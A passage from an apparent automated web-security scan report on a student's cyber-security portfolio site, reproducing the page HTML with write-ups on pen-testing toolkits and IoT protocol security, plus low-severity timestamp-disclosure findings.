          <li>Date: October 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal24" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal25" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">My personal pen-testing toolboxes</p>
          <p>Like every other profession good tools make a world of difference on the quality and
          efficiency of the end product. This isn't any different with cyber security. Good tools
          can improve results providing you with more information and helping with getting to the
          results faster.</p>
          <h3>On the road</h3>
          <a href="img/portfolio/minor/red/kalilinux.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/kalilinux.jpg" alt=""></a>
          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
          <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
           <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
          <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
           </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
           <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          166584919
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        17. GET https://beekmans.dev/
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          16894306, which evaluates to: 1970-07-15 13:51:46

          Request
          Request line and header section (224 bytes)
          GET https://beekmans.dev/ HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1039 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:13 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O9CfHQgObVNEaGCeR54qKKwytECMmlM5H0bXWDqJpVGo4vNUT18M2ld9NoeIDxTsPe1bzHv%2F9eh3xB7p6KNQNXYdikH5v2vQoVZ4Lqr2%2BgmRM8bXQ1W95L9VnzmijHE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a326098f0c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178339 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
